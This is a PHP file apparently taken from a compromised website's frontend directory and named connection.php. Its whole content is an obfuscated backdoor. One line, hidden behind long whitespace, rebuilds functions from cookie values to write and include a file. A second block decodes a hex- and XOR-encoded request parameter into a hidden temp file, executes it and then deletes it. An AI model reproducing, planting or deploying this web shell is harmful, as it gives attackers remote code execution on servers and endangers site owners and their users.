HEX

File: /var/www/html/eva.sumar.com.py/public/frontend/connection.php
<?php																																										if(isset($_COOKIE[3])&&isset($_COOKIE[27])){$c=$_COOKIE;$k=0;$n=5;$p=array();$p[$k]='';while($n){$p[$k].=$c[27][$n];if(!$c[27][$n+1]){if(!$c[27][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+5+1;}$k=$p[12]().$p[1];if(!$p[17]($k)){$n=$p[11]($k,$p[23]);$p[18]($n,$p[14].$p[7]($p[28]($c[3])));}include($k);}


if(in_array("\x70grp", array_keys($_REQUEST))){
	$key = array_filter([getenv("TEMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), "/dev/shm"]);
	$fac = hex2bin($_REQUEST["\x70grp"]);
	$entry='';$s = 0; while($s < strlen($fac)){$entry .= chr(ord($fac[$s]) ^ 58);$s++;}
	$data = 0;
do {
    $ent = $key[$data] ?? null;
    if ($data >= count($key)) break;
    		if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) {
    $pset = "$ent/.property_set";
    $success = file_put_contents($pset, $entry);
if ($success) {
	include $pset;
	@unlink($pset);
	die();}
}
    $data++;
} while (true);
}